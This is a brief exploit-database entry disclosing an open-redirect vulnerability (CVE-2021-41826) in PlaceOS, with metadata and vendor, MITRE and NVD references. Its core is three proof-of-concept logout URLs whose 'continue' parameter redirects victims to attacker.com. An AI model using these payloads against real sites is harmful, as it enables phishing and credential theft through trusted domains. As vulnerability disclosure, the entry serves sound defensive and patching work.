Share
## https://sploitus.com/exploit?id=PACKETSTORM:164345
# Exploit Title: PlaceOS 1.2109.1 - Open Redirection  
# Date: 29-09-2021  
# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team  
# Vendor Homepage: https://place.technology/  
# Software Link: https://github.com/PlaceOS  
# Version: < 1.29.10  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2021-41826  
#  
#  
# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"  
# "https://office.example.com/auth/logout?continue=.attacker.com"  
# "https://office.example.com/auth/logout?continue=:password@attacker.com"  
#  
#  
# Reference: https://github.com/PlaceOS/auth/issues/36  
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826  
# https://nvd.nist.gov/vuln/detail/CVE-2021-41826